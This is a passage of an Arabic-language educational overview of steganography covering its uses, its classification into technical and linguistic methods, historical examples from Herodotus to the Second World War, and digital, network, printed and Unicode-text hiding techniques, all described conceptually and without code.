-4ﺛم ﯾﻘوم اﻟﺷﺧص Mr. Bﺑﺎﺳﺗﺧراج ﻣﺣﺗوﯾﺎت اﻟﺻورة ﺑﺎﺳﺗﺧدام ﺑراﻣﺞ اﻻﺳﺗﺧراج ﻣﻊ اﻟﻣﻔﺗﺎح اﻟﻣﺷﺗرك ﺑﯾﻧﮭم.
-5ﯾﻘوم اﻟﺷﺧص Mr. Aﺑﺈﻧﺷﺎء رﺳﺎﻟﺔ رد وﻟﺗﻛن ﻣﺛﻼ .REPLYﺛم ﯾﻘوم ﺑﺗﺿﻣﯾﻧﮭﺎ داﺧل ﺻورة اﻟﺣوت اﻟﻘﺎﺗل.
ﻓﻲ وﺳﺎﺋل اﻟﺗرﻓﯾﮫ ﯾﻣﻛن اﺳﺗﺧدام industry steganographyﻟﺣﻣﺎﯾﺔ ﺣﻘوق اﻟﺗﺄﻟﯾف واﻟﻧﺷر ﻷﻗراص اﻟﻔﯾدﯾو اﻟرﻗﻣﯾﺔ واﻷﻗراص اﻟﻣدﻣﺟﺔ.
ﺗم ﺗﺻﻣﯾم ﺑرﻧﺎﻣﺞ ﺣﻣﺎﯾﺔ ﻧﺳﺧﺔ دي ﻓﻲ دي ﻟدﻋم ﻧظﺎم إدارة ﺗوﻟﯾد اﻟﻧﺳﺦ.
)Metadata Hiding (Tracking Information
ﯾﻣﻛن اﺳﺗﺧدام اﻟﺑﯾﺎﻧﺎت اﻟوﺻﻔﯾﺔ ) (metadataﻟﺗﺗﺑﻊ اﻟﻣوﻗﻊ اﻟﺟﻐراﻓﻲ ،وﻣﻧﻊ أو ﻣراﻗﺑﺔ ﻧﺳﺦ اﻟﻣواد اﻟرﻗﻣﯾﺔ ،أي ﻣﻧﻊ اﻻزدواﺟﯾﺔ ﻏﯾر
اﻟﻣﺻرح ﺑﮭﺎ ﻟﻠﺑﯾﺎﻧﺎت اﻟرﻗﻣﯾﺔ.
)Broadcast Monitoring (Gibson, Pattern Recognition
Covert Communication
Ownership Assertion
)Fingerprinting (Traitor Tracking
)Authentication (Original vs. Forgery
Classification of Steganography
ﯾﺻﻧف ﺗﻘﻧﯾﺎت إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ) (Steganographyإﻟﻰ ﻣﺟﺎﻟﯾن اﺳﺗﻧﺎدا ً إﻟﻰ ﺗﻘﻧﯾﺎت إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت .وھﻲ إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت اﻟﺗﻘﻧﻲ
) (technical steganographyوإﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت اﻟﻠﻐوﯾﺔ). (linguistic steganography
إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت اﻟﺗﻘﻧﻲ ) (technical steganographyﺗﻘوم ﺑﺈﺧﻔﺎء اﻟرﺳﺎﻟﺔ ﺑﺎﺳﺗﺧدام اﻷﺳﺎﻟﯾب اﻟﻌﻠﻣﯾﺔ ،ﺑﯾﻧﻣﺎ ﯾﻘوم إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت اﻟﻠﻐوﯾﺔ
) (linguistic steganographyﺑﺈﺧﻔﺎء اﻟرﺳﺎﻟﺔ ﻓﻲ اﻟﻧﺎﻗل) ،(Carrierوﺳﯾﻠﺔ ﺗﺳﺗﺧدم ﻟﻼﺗﺻﺎل أو ﻧﻘل اﻟرﺳﺎﺋل أو اﻟﻣﻠﻔﺎت .ﻋﺎدة ﻣﺎ ﯾﺗم
ﺗﻌرﯾف ﻣﺗوﺳط إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ) (The steganography mediumﻋﻠﻰ أﻧﮫ اﻟﺟﻣﻊ ﺑﯾن اﻟرﺳﺎﻟﺔ اﻟﻣﺧﻔﯾﺔ ،واﻟﻧﺎﻗل ،وﻣﻔﺗﺎح إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت.
ﯾﺻف اﻟﻣﺧطط اﻟﺗﺎﻟﻲ ﺗﺻﻧﯾف ﻟﺗﻘﻧﯾﺎت إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت.
إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت اﻟﺗﻘﻧﻲ ﻟدﯾﮫ اﻟﻌدﯾد ﻣن اﻷﺳﺎﻟﯾب ﻟﺗﺣﻘﯾﻖ إﺧﻔﺎء اﻟرﺳﺎﻟﺔ .وﺗﺷﻣل ﺑﻌض ﻣﻧﮭم ﻛﺎﻻﺗﻰ:
-اﻟﺣﺑر اﻟﺳري )(Invisible Ink
ھذا اﻷﺳﻠوب ﯾﺳﺗﺧدم اﻟﺣﺑر اﻟﺳري ﻹﺧﻔﺎء اﻟرﺳﺎﺋل اﻟﻧﺻﯾﺔ .
-ﻣﯾﻛرودوﺗس )(Microdots
ھﻲ اﻟطرﯾﻘﺔ اﻟﺗﻲ ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻹﺧﻔﺎء ﺻﻔﺣﺔ ﻓﻲ ﻧﻘطﺔ واﺣده.
-اﻷﺳﺎﻟﯾب اﻟﻣﺳﺗﻧدة إﻟﻰ اﻟﻛﻣﺑﯾوﺗر)(Computer-based methods
اﺳﺗﺧدام اﻟﻣﻌﻠوﻣﺎت واﺧﻔﺎﺋﮭﺎ ﻓﻲ اﻟﻧﺻوص ،واﻟﺻور واﻷﺻوات وأﺷرطﺔ اﻟﻔﯾدﯾو ،إﻟﺦ.
إﺧﻔﺎء اﻟﻤﻌﻠﻮﻣﺎت اﻟﻠﻐﻮﯾﺔ )(linguistic steganography
إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت اﻟﻠﻐوي ﯾﻘوم ﺑﺈﺧﻔﺎء اﻟرﺳﺎﻟﺔ ﻓﻲ ﻧﺎﻗل )(Carrier\vesselsﺑﺎﺳﺗﺧدام ﺑﻌض اﻟطرق اﻟﻣﺑﺗﻛرة .ﯾﺗم ﺗﺻﻧﯾف ھذه اﻟﺗﻘﻧﯾﺔ ،ﻋﻠﻰ
أﻧﮭﺎ semagramsأو .open codes
Semagrams -1
ﯾﺳﺗﺧدم ھذا اﻷﺳﻠوب اﻟرﻣوز واﻟﻌﻼﻣﺎت اﻟﻣﺧﺗﻠﻔﺔ ﻹﺧﻔﺎء اﻟﺑﯾﺎﻧﺎت أو اﻟرﺳﺎﺋل .ﻛذﻟك ﯾﺻﻧف ھذا أﯾﺿﺎ اﻟﻰ ﺳﯾﻣﺎﺟراﻣس اﻟﺑﺻري
وﺳﯾﻣﺎﺟراﻣس اﻟﻧﺻﻲ.
-ﺳﯾﻣﺎﺟراﻣس اﻟﺑﺻري )(Visual Semagrams
ﯾﺳﺗﺧدم ھذا اﻷﺳﻠوب اﻟﻛﺎﺋﻧﺎت اﻟﻣﺎدﯾﺔ اﻟﻐﯾر ﺿﺎره ) (unmalicious physical objectsﻹرﺳﺎل رﺳﺎﻟﺔ ﻣﺛل رﺳوﻣﺎت اﻟﺷﻌﺎرات أو ﺗﺣدﯾد
ﻣواﻗﻊ اﻟﻌﻧﺎﺻر اﻟﻣوﺟودة ﻓﻲ اﻟﻣﻛﺗب أو اﻟﻣوﻗﻊ ﻋﻠﻰ ﺷﺑﻛﺔ اﻹﻧﺗرﻧت.
-ﺳﯾﻣﺎﺟراﻣس اﻟﻧﺻﻲ )(Text Semagrams
ﯾﺳﺗﺧدم ھذا اﻷﺳﻠوب ﻓﻲ إﺧﻔﺎء ﻧص اﻟرﺳﺎﻟﺔ ﻋن طرﯾﻖ ﺗﺣوﯾل أو ﺗﻐﯾﯾر ﻣظﮭر اﻟرﺳﺎﻟﺔ اﻟﻧﺻﯾﺔ اﻟﻧﺎﻗﻠﺔ ،ﻣﺛل ﺗﻐﯾﯾر أﺣﺟﺎم اﻟﺧطوط واﻷﻧﻣﺎط،
وإﺿﺎﻓﺔ ﻣﺳﺎﻓﺎت إﺿﺎﻓﯾﺔ ﻛﻣﺳﺎﻓﺎت ﺑﯾﺿﺎء ﻓﻲ اﻟوﺛﯾﻘﺔ ،واﻻﻧﻔﻌﺎﻻت اﻟﻣﺧﺗﻠﻔﺔ ﻓﻲ اﻟﺧطﺎﺑﺎت أو اﻟﻧص اﻟﻣﻛﺗوب ﺑﺧط اﻟﯾد.
Open codes -2
Open codesﯾﻘوم ﺑﺈﺧﻔﺎء اﻟرﺳﺎﻟﺔ اﻟﺳرﯾﺔ ﻓﻲ رﺳﺎﻟﺔ ﺷرﻋﯾﮫ ﺣﺎﻣﻠﺔ ) (legitimate carrier messageواﻟﺗﻲ ﺻﻣﻣت ﺧﺻﯾﺻﺎ ﻓﻲ ﻧﻣط
اﻟوﺛﯾﻘﺔ/اﻟﻣﺳﺗﻧد واﻟﺗﻲ ﻻ ﺗﻛون واﺿﺣﮫ ﻟﻠﻘﺎرئ اﻟﻌﺎدي .ﺣﺎﻣل اﻟرﺳﺎﻟﺔ أﺣﯾﺎﻧﺎ ﯾطﻠﻖ ﻋﻠﯾﮫ أﺳم اﻻﺗﺻﺎل اﻟﻣﻛﺷوف )(overt communication
واﻟرﺳﺎﻟﺔ اﻟﺳرﯾﺔ ﯾطﻠﻖ ﻋﻠﯾﮫ اﺳم اﻻﺗﺻﺎل اﻟﺳري ) .(covert communicationﺗﻘﻧﯾﺔ Open codesﺗﻧﻘﺳم إﻟﻰ ﻣﺟﻣوﻋﺗﯾن رﺋﯾﺳﯾﺗﯾن :وھﻣﺎ
jargon codesو .covered ciphersﻛﻣﺎ ﯾﻧﻘﺳم covered ciphersاﯾﺿﺎ اﻟﻰ ﻧوﻋﯾن null ciphers :و.grille ciphers
jargon codes -
Jargon codesھﻲ ﻋﺑﺎره ﻋن ﻟﻐﺔ ﯾﻔﮭﻣﮭﺎ ﻣﺟﻣوﻋﺔ ﻣن اﻟﻧﺎس وﻟﻛن ﻻ ﯾﻔﮭﻣﮭﺎ اﻻﺧرﯾن .ھذه اﻷﻛواد ﺗﺳﺗﺧدم اﻹﺷﺎرات ،واﻟﻣﺻطﻠﺣﺎت،
واﻷﺣﺎدﯾث اﻟﺗﻲ ﻟﮭﺎ ﻣﻌﻧﻰ ﺧﺎص واﻟﺗﻲ ﺗﻛون ﻣﻔﮭوﻣﮫ ﻟﻣﺟﻣوﻋﺔ ﻣﺣددة ﻣن اﻟﻧﺎس .اﻟﻣﺟﻣوﻋﺔ اﻟﻔرﻋﯾﺔ ﻣن Jargon codesھﻲ رﻣوز ﺟدﯾﻠﺔ
) ،(cue codesﺣﯾث ﺗﺣول ﺑﻌض اﻟﻌﺑﺎرات اﻟﺗﻲ ﺗم ﺗرﺗﯾﺑﮭﺎ ﻣﺳﺑﻘﺎ ً اﻟﻰ ﻣﻌﺎﻧﻲ.
covered ciphers -
ﻓﯾﮫ ﺗﻛون اﻟرﺳﺎﻟﺔ ﻣﺧﻔﯾﮫ ﻋﻠﻧﺎ ﻓﻲ اﻟوﺳﯾط اﻟﻧﺎﻗل ﺣﯾث أن أي ﺷﺧص ﯾﻌرف ﺳر ﻛﯾﻔﯾﺔ إﺧﻔﺎء اﻟرﺳﺎﻟﺔ ﯾﻣﻛن اﺳﺗﻌﺎدﺗﮭﺎ .وﯾﻧﻘﺳم ھذا اﻟﻧوع اﻟﻰ
ﻧوﻋﯾن اﺧرﯾن ھﻣﺎ grille ciphers :و.null ciphers
Grille ciphersھذا اﻟﻧوع ﯾﺳﺗﺧدم اﻟﻘﺎﻟب ) (Templateواﻟذى ﯾﺳﺗﺧدم ﻟﺗﻐطﯾﺔ اﻟرﺳﺎﻟﺔ اﻟﻧﺎﻗﻠﺔ .اﻟﻛﻠﻣﺎت اﻟﺗﻲ ﺗظﮭر ﻓﻲ ﻓﺗﺣﺎت اﻟﻘﺎﻟب ھﻲ
اﻟرﺳﺎﻟﺔ اﻟﻣﺧﻔﯾﺔ.
ً
Null cipherﯾﺧﻔﻲ اﻟرﺳﺎﻟﺔ ﺑﺎﺳﺗﺧدام ﻣﺟﻣوﻋﺔ ﻣن اﻟﻘواﻋد اﻟﻣرﺗﺑﺔ ﻣﺳﺑﻘﺎ ،ﻣﺛل 'اﻟﻘراءة ﻋﻧد اﻟﻛﻠﻣﺔ اﻟﺧﺎﻣﺳﺔ' أو '' اﻟﻧظر إﻟﻰ اﻟﺣرف اﻟﺛﺎﻟث
ﻣن ﻛل ﻛﻠﻣﺔ ' .وﯾﻣﻛن اﺳﺗﺧداﻣﮫ أﯾﺿﺎ ﻓﻲ إﺧﻔﺎء ﻧص ﻣﺷﻔر.
ﯾﻮﺟﺪ ﺗﻘﺴﯿﻢ اﺧﺮ ﻟﺘﻘﻨﯿﺎت إﺧﻔﺎء اﻟﻤﻌﻠﻮﻣﺎت واﻟﺘﻲ ذﻛﺮ ﻣﻦ ﺧﻼل ﻣﻮﻗﻊ وﯾﻜﺒﯿﺪﯾﺎ ﻛﺎﻻﺗﻰ:
-1ﺗﻘﻧﯾﺎت ﻣﺎدﯾﺔ
اﺳﺗﺧدم إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ﻋﻠﻰ ﻧطﺎق واﺳﻊ ،ﻓﻲ اﻟﻌﺻور اﻟﺗﺎرﯾﺧﯾﺔ اﻟﺣدﯾﺛﺔ وﺣﺗﻰ ﯾوﻣﻧﺎ ھذا .وﻣن اﻷﻣﺛﻠﺔ اﻟﻣﻌروﻓﺔ
اﻟرﺳﺎﺋل ﻣﺧﻔﯾﺔ ﻓﻲ أطﺑﺎق اﻟﺷﻣﻊ ""wax tabletﻓﻲ اﻟﻌﺻور اﻟﻘدﯾﻣﺔ ،ﻛﺗب اﻟﻧﺎس اﻟرﺳﺎﺋل ﻋﻠﻰ اﻟﺧﺷب ﺛم ﻏطوھﺎ ﺑطﺑﻘﺔ ﻣن اﻟﺷﻣﻊ ،ﻛﺗب
ﻋﻠﯾﮭﺎ رﺳﺎﻟﺔ ﻏﯾر ﻣرﯾﺑﺔ.
رﺳﺎﺋل ﺧﻔﯾﺔ ﻋﻠﻰ ﺟﺳم اﻟرﺳول -اﺳﺗﺧدﻣت أﯾﺿﺎ ﻓﻲ اﻟﯾوﻧﺎن اﻟﻘدﯾﻣﺔ .ھﯾرودوت ﯾﺣﻛﻲ ﻗﺻﺔ رﺳﺎﻟﺔ وﺷم ﻋﻠﻰ رأس رﺟل ﺣﻠﯾﻖ ﻣن ﻋﺑﯾد
ھﯾﺳﺗﺎ ﯾوس" ، "Histiaeusﻏطﺎھﺎ اﻟﺷﻌر اﻟذي ﻧﻣﺎ ﻓوﻗﮭﺎ ﺑﻌد ذﻟك ،وﻛﺷﻔت ﻋﻧد ﺣﻠﻖ اﻟرأس ﻣرة أﺧرى .اﻟرﺳﺎﻟﺔ ﺗﺗﺿﻣن ﺗﺣذﯾرا إﻟﻰ
اﻟﯾوﻧﺎﻧﯾﯾن ﻋن ﺧطط اﻟﻐزو اﻟﻔﺎرﺳﻲ .ھذا اﻷﺳﻠوب ﻟﮫ ﻋﯾوب واﺿﺣﺔ ،ﻣﺛل ﺗﺄﺧر اﻟﻧﻘل أﺛﻧﺎء اﻧﺗظﺎر ﻧﻣو ﺷﻌر اﻟﻌﺑد ،واﻟﻘﯾود اﻟﻣﻔروﺿﺔ ﻋﻠﻰ
ﻋدد وﺣﺟم اﻟرﺳﺎﺋل اﻟﺗﻲ ﯾﻣﻛن ﺗﺷﻔﯾرھﺎ ﻋﻠﻰ ﻓروة اﻟرأس ﻟﺷﺧص واﺣد.
ﻓﻲ اﻷﯾﺎم اﻷوﻟﻰ ﻟﻠﻣطﺎﺑﻊ ،ﻛﺎن ﻣن اﻟﺷﺎﺋﻊ ﻣزج اﻟﻣﺣﺎرف ) (typefacesاﻟﻣﺧﺗﻠﻔﺔ ﻋﻠﻰ اﻟﺻﻔﺣﺔ اﻟﻣطﺑوﻋﺔ اﻟواﺣدة .وﯾرﺟﻊ ذﻟك إﻟﻰ ﻋدم
وﺟود ﻧﺳﺦ ﻛﺎﻓﯾﺔ ﻣن ﺑﻌض اﻟﺣروف ﻟﻠطﺎﺑﻌﺔ .وﻟذﻟك ،ﯾﻣﻛن أن ﺗﻛﺗب رﺳﺎﻟﺔ ﻣﺧﻔﯾﺔ ﺑﺎﺳﺗﺧدام اﺛﻧﯾن )أو أﻛﺛر( ﻣن اﻟﻣﺣﺎرف اﻟﻣﺧﺗﻠﻔﺔ ،ﻣﺛل
ﻣﺣرف ﻣن اﻟﻧوع اﻟﻌﺎدي أو اﻟﻣﺎﺋل.
ﺧﻼل اﻟﺣرب اﻟﻌﺎﻟﻣﯾﺔ اﻟﺛﺎﻧﯾﺔ أرﺳﻠت اﻟﻣﻘﺎوﻣﺔ اﻟﻔرﻧﺳﯾﺔ ﺑﻌض اﻟرﺳﺎﺋل اﻟﻣﻛﺗوﺑﺔ ﻋﻠﻰ ظﮭر ﺳﻌﺎة ﺑﺎﺳﺗﺧدام ﺣﺑر ﺧﻔﻲ .رﺳﺎﺋل ﻣﺧﻔﯾﺔ ﻓﻲ ورﻗﺔ
ﻣﻛﺗوﺑﺔ ﺑﺎﺳﺗﺧدام ﺣﺑر ﺧﻔﻲ ،ﺗﺣت رﺳﺎﺋل أﺧرى أو ﻋﻠﻰ أﺟزاء ﻓﺎرﻏﺔ ﻣن اﻟرﺳﺎﺋل اﻷﺧرى .رﺳﺎﺋل ﻣﻛﺗوﺑﺔ ﺑﺷﻔرة ﻣورس ﺑﺣﯾﺎﻛﺔ ﻏزل ﺛم
ﺧﯾطت ،اﻟﻘطﻌﺔ اﻟﻣﺣﺎﻛﺔ ،ﻓﻲ ﻗطﻌﺔ ﻣن اﻟﻣﻼﺑس اﻟﺗﻲ ﯾرﺗدﯾﮭﺎ اﻟﺳﺎﻋﻲ.
-2ﺗﻘﻧﯾﺎت رﻗﻣﯾﺔ
دﺧﻠت ﺗﻘﻧﯾﺎت إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت اﻟﺣدﯾﺛﺔ ﻓﻲ ﺳﻧﺔ 1985ﻣﻊ ظﮭور اﻟﺣواﺳﯾب اﻟﺷﺧﺻﯾﺔ ،وﺟرى ﺗطﺑﯾﻖ ﻣﺷﺎﻛل إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت اﻟﺗﻘﻠﯾدﯾﺔ
ﻋﻠﯾﮭﺎ .إن اﻟﺗطور اﻟذي أﻋﻘب ذﻟك ﻛﺎن ﺑطﯾﺋﺎ ،وﻟﻛن ﻣﻧذ اﻧطﻼﻗﮭﺎ ،ﺗﻌﺎظم ﺣﺟم ﺑرﻣﺟﯾﺎت اﻟﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ اﻟﻣﺗﺎﺣﺔ.
إﺧﻔﺎء اﻟرﺳﺎﺋل ﺑﺗﺿﻣﯾﻧﮭﺎ ﻓﻲ اﻟﺑﺗﺎت اﻷﻗل أھﻣﯾﺔ ﻟﻠﺻور اﻟﻣﺷوﺷﺔ أو ﻣﻠﻔﺎت اﻟﺻوت.
إﺧﻔﺎء اﻟﺑﯾﺎﻧﺎت ﺿﻣن ﺑﯾﺎﻧﺎت ﻣﺷﻔرة أو ﺿﻣن ﺑﯾﺎﻧﺎت ﻋﺷواﺋﯾﺔ.
ﺗﺷﻔر اﻟﺑﯾﺎﻧﺎت اﻟﺗﻲ ﯾراد اﺧﻔﺎؤھﺎ ،ﻗﺑل اﺳﺗﺧداﻣﮭﺎ ﻟﻠﻛﺗﺎﺑﺔ ﻓوق ﺟزء ﻣن ﻛﺗﻠﺔ أﻛﺑر ﺑﻛﺛﯾر ﻣن اﻟﺑﯾﺎﻧﺎت اﻟﻣﺷﻔرة أو ﻛﺗﻠﺔ ﻣن اﻟﺑﯾﺎﻧﺎت
اﻟﻌﺷواﺋﯾﺔ( اﻟﺷﻔرات اﻟﻐﯾر ﻗﺎﺑﻠﺔ ﻟﻠﻛﺳر ﻣﺛل ﻟوﺣﺔ اﻟﻣرة اﻟواﺣدة One-time padﺗوﻟد ﻧﺻوص ﻣﺷﻔرة ،ﺗﺑدو ﻋﺷواﺋﯾﺔ ﺗﻣﺎﻣﺎ إذا ﻛﺎن اﻟﻣﮭﺎﺟم
ﻻ ﯾﻣﻠك اﻟﻣﻔﺗﺎح اﻟﺧﺎص)". ("private key
اﻹﺧﻔﺎء ﺑﺗﻌدﯾل اﻟﺻدى ﻓﻲ ﻣﻠف اﻟﺻوت.
اﻹﺧﻔﺎء اﻵﻣن ﻓﻲ اﻹﺷﺎرات اﻟﺻوﺗﯾﺔ.
اﻹﺧﻔﺎء ﺑﺗﻌدﯾل اﻟﺻدى ﻓﻲ ﻣﻠف اﻟﺻوت.
ﺗﺿﻣﯾن اﻟﺑﯾﺎﻧﺎت ﻓﻲ أﻗﺳﺎم ﻣﮭﻣﻠﺔ ﻣن اﻟﻣﻠف ،ﻣﺛل ﺑﻌد ﻧﮭﺎﯾﺔ ﺳطر ﻣرﺋﻲ ﻟﻣﻠف اﻟﻧﺎﻗل.
ﺟﻌل اﻟﻧص ﺑﻧﻔس ﻟون اﻟﺧﻠﻔﯾﺔ ﻓﻲ وﺛﺎﺋﻖ ﻣﻌﺎﻟﺞ اﻟﻛﻠﻣﺎت ،ورﺳﺎﺋل اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ ،واﻟﻣﺷﺎرﻛﺎت ﻓﻲ اﻟﻣﻧﺗدى.
-3ﺗﻘﻧﯾﺎت ﺷﺑﻛﯾﺔ
ﺟﻣﯾﻊ ﺗﻘﻧﯾﺎت ﺗﺑﺎدل ﻣﻘﺎطﻊ اﻟﻣﻌﻠوﻣﺎت اﻟﻣﺧﻔﯾﺔ " "steganogramاﻟﺗﻲ ﯾﻣﻛن ﺗﺑﺎدﻟﮭﺎ ﻓﻲ ﺷﺑﻛﺎت اﻻﺗﺻﺎل اﻟﺳﻠﻛﻲ واﻟﻼﺳﻠﻛﻲ ،ﺗﺳﻣﻰ ﺑﺎﻹﺧﻔﺎء
اﻟﺷﺑﻛﻲ” . "network steganographyاول اﺳﺗﺧدام ﻟﮭذه اﻟﺗﺳﻣﯾﺔ ﻛﺎن ﻣن ﻗﺑل "ﻛرﯾﺳﺗوف ﺷﯾﺑﯾورﺳﻛﻲ ﺳﻧﺔ .2003ﺑﺎﻟﺗﻘﺎﺑل ﻣﻊ اﻷﺳﺎﻟﯾب
اﻟﺗﻘﻠﯾدﯾﺔ اﻟﺗﻲ ﺗﺳﺗﺧدم اﻟﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ اﻟوﺳﺎﺋط اﻟرﻗﻣﯾﺔ )ﻣﻠﻔﺎت اﻟﺻور واﻟﺻوت واﻟﻔﯾدﯾو( ﻛﻐطﺎء ﻟﻠﺑﯾﺎﻧﺎت اﻟﻣﺧﻔﯾﺔ ،ﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ اﻟﺷﺑﻛﺔ
ﯾﺳﺗﺧدم ﻋﻧﺎﺻر اﻟﺗﺣﻛم ﻟﺑروﺗوﻛوﻻت اﻻﺗﺻﺎﻻت واﻟوظﺎﺋف اﻟﺟوھرﯾﺔ اﻷﺳﺎﺳﯾﺔ .وﻧﺗﯾﺟﺔ ﻟذﻟك ،ھذه اﻷﺳﺎﻟﯾب ھﻲ أﺻﻌب ﻓﻲ اﻟﻛﺷف ﻋﻧﮭﺎ
واﻟﻘﺿﺎء ﻋﻠﯾﮭﺎ .ﺗﻧطوي أﺳﺎﻟﯾب ﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ اﻟﺷﺑﻛﺔ اﻟﻧﻣوذﺟﯾﺔ ﻋﻠﻰ ﺗﻌدﯾل ﺧﺻﺎﺋص ﺑروﺗوﻛول ﺷﺑﻛﺔ اﺗﺻﺎل واﺣد .وﯾﻣﻛن ﺗطﺑﯾﻖ ھذا
اﻟﺗﻌدﯾل إﻟﻰ)) PDU (Protocol Data Unitوﺣدة ﺑﯾﺎﻧﺎت اﻟﺑروﺗوﻛول( .ﻋﻼوة ﻋﻠﻰ ذﻟك ،ﻓﻣن اﻟﻣﻣﻛن اﻻﺳﺗﻔﺎدة ﻣن اﻟﻌﻼﻗﺔ ﺑﯾن اﺛﻧﯾن أو
أﻛﺛر ﻣن ﺑروﺗوﻛوﻻت اﻟﺷﺑﻛﺔ اﻟﻣﺧﺗﻠﻔﺔ ﻟﺗﻣﻛﯾن اﻻﺗﺻﺎﻻت اﻟﺳرﯾﺔ .ﺗﻘﻊ ھذه اﻟﺗطﺑﯾﻘﺎت ﺗﺣت ﻣﺻطﻠﺢ).(inter-protocol steganography
ﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ اﻟﺷﺑﻛﺔ ﯾﻐطﻲ طﺎﺋﻔﺔ واﺳﻌﺔ ﻣن اﻟﺗﻘﻧﯾﺎت ،واﻟﺗﻲ ﺗﺷﻣل:
ﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ -إﺧﻔﺎء اﻟرﺳﺎﺋل ﻓﻲ ﻣﺣﺎدﺛﺎت). (Voice-over-IP
ﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ اﻟﺷﺑﻛﺎت اﻟﻣﺣﻠﯾﺔ اﻟﻼﺳﻠﻛﯾﺔ - WANﺑﺎﻻﺳﺗﻔﺎدة ﻣن اﻷﺳﺎﻟﯾب اﻟﺗﻲ ﯾﻣﻛن أن ﺗﻣﺎرس ﻟﻧﻘل اﻟﻣﻘﺎطﻊ اﻟﻣﺧﻔﯾﺔ ﻓﻲ
اﻟﺷﺑﻛﺎت اﻟﻼﺳﻠﻛﯾﺔ اﻟﻣﺣﻠﯾﺔ.
-4ﺗﻘﻧﯾﺎت ﻣطﺑوﻋﺔ
اﺧرج اﻟﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ اﻟرﻗﻣﻲ ﻗد ﯾﻛون ﻓﻲ ﺷﻛل وﺛﺎﺋﻖ ﻣطﺑوﻋﺔ .ﻗد ﺗﺷﻔر رﺳﺎﻟﺔ) ،ﻧص ﺻرﯾﺢ ،(plaintextأوﻻ ،ﺑﺎﻟوﺳﺎﺋل اﻟﺗﻘﻠﯾدﯾﺔ،
ﻹﻧﺗﺎج اﻟﻧص اﻟﻣﺷﻔر .ciphertextﺛم ،ﯾﺗم ﺗﻌدﯾل ﻏطﺎء ﻏﯾر ﻣرﯾب ) (cover textﺑطرﯾﻘﺔ ﻣﺎ ،ﻻﺣﺗواء اﻟﻧص اﻟﻣﺷﻔر ،ﻓﯾﻧﺗﺞ اﻟﻧص
اﻟﺣﺎوي ﻟﻠرﺳﺎﻟﺔ اﻟﻣﺧﻔﯾﺔ ) .(stegotextاﻟﻧص اﻟﻣﺷﻔر اﻟذي ﺗﻧﺗﺟﮫ أﻛﺛر وﺳﺎﺋل إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت اﻟرﻗﻣﯾﺔ ،ﻟﯾﺳت ﻗﺎﺑﻠﺔ ﻟﻠطﺑﺎﻋﺔ .اﻷﺳﺎﻟﯾب
اﻟرﻗﻣﯾﺔ اﻟﺗﻘﻠﯾدﯾﺔ ﺗﻌﺗﻣد ﻋﻠﻰ اﺣداث ﺗﻐﯾﯾر اﻟﺿوﺿﺎء )(noiseﻓﻲ اﻟﻣﻠف اﻟﻘﻧﺎة ﻹﺧﻔﺎء اﻟرﺳﺎﻟﺔ ،ﻋﻠﻰ ھذا اﻟﻧﺣو ،ﯾﺟب أن ﯾرﺳل اﻟﻣﻠف إﻟﻰ ﻗﻧﺎة
اﻟﻣﺗﻠﻘﻲ دون إﺣداث ﺿوﺿﺎء إﺿﺎﻓﯾﺔ ﻧﺗﯾﺟﺔ اﻻرﺳﺎل .اﻟطﺑﺎﻋﺔ اﻟﺗﻲ ﺗﻧﺗﺞ اﻟﻛﺛﯾر ﻣن اﻟﺿوﺿﺎء ﻓﻲ اﻟﻧص اﻟﻣﺷﻔر ،ﺗﺟﻌل اﻟرﺳﺎﻟﺔ ،ﻋﻣوﻣﺎ ،ﻏﯾر
ﻗﺎﺑﻠﺔ ﻟﻼﺳﺗرداد .ھﻧﺎك ﺗﻘﻧﯾﺎت اﻟﺗﻲ ﺗﺗﻧﺎول ھذا اﻟﻘﯾد ،ﻣﺛﺎل ھو ).(ASCII Art Steganography
-5اﻟﻧص اﻟرﻗﻣﻲ
ﯾﺳﺗﺧدم ﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ-ﯾوﻧﯾﻛود ﺣروﻓﺎ ﺗﺷﺑﮫ ﻣﺟﻣوﻋﺔ ASCIIاﻟﻣﻌﺗﺎدة ﻟﺗﺑدو طﺑﯾﻌﯾﺔ ،ﻓﻲ ﺣﯾن أﻧﮭﺎ ﺗﺣﻣل ﺑﺗﺎت إﺿﺎﻓﯾﺔ ﻣن اﻟﻣﻌﻠوﻣﺎت .إذا
ﻋرض اﻟﻧص ﺑﺷﻛل ﺻﺣﯾﺢ ،ﻓﻠن ﯾﻛون ھﻧﺎك ﻓرق ﺑﺻري ﻋن اﻟﻧص اﻟﻌﺎدي .وﻣﻊ ذﻟك ،ﺑﻌض اﻷﻧظﻣﺔ ،ﻗد ﺗﻌرض اﻟﺧطوط ﺑﺷﻛل ﻣﺧﺗﻠف،
وﺳﯾﺗم رﺻد اﻟﻣﻌﻠوﻣﺎت اﻻﺿﺎﻓﯾﺔ ﺑﺳﮭوﻟﺔ .ﻣن ﺟﮭﺔ أﺧرى ،اﻟﺣروف اﻟﻣﺧﻔﯾﺔ )ﻣﺛﻼ ،ﺣروف اﻟﺳﯾطرة( ،اﻻﺳﺗﺧدام اﻟﻣﺗﻛرر ﻟﻠﻌﻼﻣﺎت )ﻧوع
